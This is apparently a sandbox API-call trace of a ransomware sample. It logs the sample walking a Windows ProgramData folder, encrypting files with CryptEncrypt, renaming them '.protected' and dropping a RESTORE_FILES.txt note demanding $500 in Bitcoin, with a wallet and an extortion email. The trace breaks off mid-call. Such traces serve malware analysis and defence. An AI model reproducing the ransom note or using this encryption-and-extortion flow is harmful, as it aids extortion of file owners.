SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.016] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.017] lstrlenA (lpString="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") returned 684 [0071.017] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.017] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.017] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.017] CloseHandle (hObject=0xb4) returned 1 [0071.017] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="Windows") returned -1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="Program Files") returned 1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="Program Files (x86)") returned 1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="$Recycle.bin") returned 1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="System Volume Information") returned -1 [0071.017] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData") returned 46 [0071.017] lstrcmpW (lpString1="PublishedData", lpString2=".") returned 1 [0071.017] lstrcmpW (lpString1="PublishedData", lpString2="..") returned 1 [0071.017] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*") returned 48 [0071.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.018] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.018] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.018] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.018] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0071.018] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.018] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\.") returned 48 [0071.018] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.018] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.018] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.018] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.018] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.018] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.018] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.018] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\..") returned 49 [0071.018] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.018] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.018] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.018] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="Windows") returned -1 [0071.019] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="Program Files") returned 1 [0071.019] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="Program Files (x86)") returned 1 [0071.019] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="$Recycle.bin") returned 1 [0071.019] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="System Volume Information") returned -1 [0071.019] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned 65 [0071.019] StrStrIW (lpFirst="RacWmiDatabase.sdf", lpSrch=".protected") 
returned 0x0 [0071.019] lstrcmpW (lpString1="RacWmiDatabase.sdf", lpString2="RESTORE_FILES.txt") returned -1 [0071.019] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.019] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.019] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.019] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.019] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.020] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt") returned 64 [0071.020] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.036] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.036] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.036] lstrlenA (lpString="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") returned 684 [0071.036] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.036] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.036] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.036] CloseHandle (hObject=0xb4) returned 1 [0071.037] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="Windows") returned -1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="Program Files") returned 1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="Program Files (x86)") returned 1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="$Recycle.bin") returned 1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="System Volume Information") returned -1 [0071.037] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData") returned 42 [0071.037] lstrcmpW (lpString1="StateData", lpString2=".") returned 1 [0071.037] lstrcmpW (lpString1="StateData", lpString2="..") returned 1 [0071.037] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*") returned 44 [0071.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.037] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.037] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.037] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.037] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.037] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.037] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\.") returned 44 [0071.037] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.037] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.037] 
lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.037] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.037] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.037] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.037] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.037] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\..") returned 45 [0071.037] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.037] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.038] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Windows") returned -1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Program Files") returned 1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Program Files (x86)") returned 1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="$Recycle.bin") returned 1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="System Volume Information") returned -1 [0071.038] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned 58 [0071.038] StrStrIW (lpFirst="RacDatabase.sdf", lpSrch=".protected") returned 0x0 [0071.038] lstrcmpW (lpString1="RacDatabase.sdf", lpString2="RESTORE_FILES.txt") returned -1 [0071.038] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.038] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.038] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.038] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Windows") returned -1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Program Files") returned 1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Program Files (x86)") returned 1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="$Recycle.bin") returned 1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="System Volume Information") returned -1 [0071.038] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat") returned 58 [0071.038] StrStrIW (lpFirst="RacMetaData.dat", lpSrch=".protected") returned 0x0 [0071.038] lstrcmpW (lpString1="RacMetaData.dat", lpString2="RESTORE_FILES.txt") returned -1 [0071.038] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.038] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.038] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: 
lpFindFileData=0x295ef20) returned 1 [0071.038] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="Windows") returned -1 [0071.038] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="Program Files") returned 1 [0071.038] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="Program Files (x86)") returned 1 [0071.038] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="$Recycle.bin") returned 1 [0071.039] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="System Volume Information") returned -1 [0071.039] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0071.039] StrStrIW (lpFirst="RacWmiDataBookmarks.dat", lpSrch=".protected") returned 0x0 [0071.039] lstrcmpW (lpString1="RacWmiDataBookmarks.dat", lpString2="RESTORE_FILES.txt") returned -1 [0071.039] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.039] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.039] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0071.039] StrStrW (lpFirst="RacWmiDataBookmarks.dat", lpSrch=".txt") returned 0x0 [0071.039] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0071.039] StrStrW (lpFirst="RacWmiDataBookmarks.dat", lpSrch=".rar") returned 0x0 [0071.039] 
lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0071.039] StrStrW (lpFirst="RacWmiDataBookmarks.dat", lpSrch=".zip") returned 0x0 [0071.039] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0071.040] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.040] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0071.040] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.040] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0071.040] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0071.040] CloseHandle (hObject=0xd4) returned 1 [0071.041] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.protected") returned 76 [0071.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.protected" (normalized: 
"c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat.protected")) returned 1 [0071.042] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Windows") returned -1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Program Files") returned 1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Program Files (x86)") returned 1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="$Recycle.bin") returned 1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="System Volume Information") returned -1 [0071.042] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat") returned 62 [0071.042] StrStrIW (lpFirst="RacWmiEventData.dat", lpSrch=".protected") returned 0x0 [0071.042] lstrcmpW (lpString1="RacWmiEventData.dat", lpString2="RESTORE_FILES.txt") returned -1 [0071.042] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.042] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.042] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.042] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.042] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.042] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt") returned 60 [0071.042] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.042] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.042] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.043] lstrlenA (lpString="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") returned 684 [0071.043] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.043] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.043] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.043] CloseHandle (hObject=0xb4) returned 1 [0071.043] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0071.043] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0071.044] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp") returned 37 [0071.044] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0071.044] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0071.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*") returned 39 [0071.044] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.044] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.044] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.044] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.044] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.044] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\.") returned 39 [0071.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.044] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.044] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.044] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.044] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.044] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.044] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\..") returned 40 [0071.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.044] FindNextFileW (in: hFindFile=0x447c80, 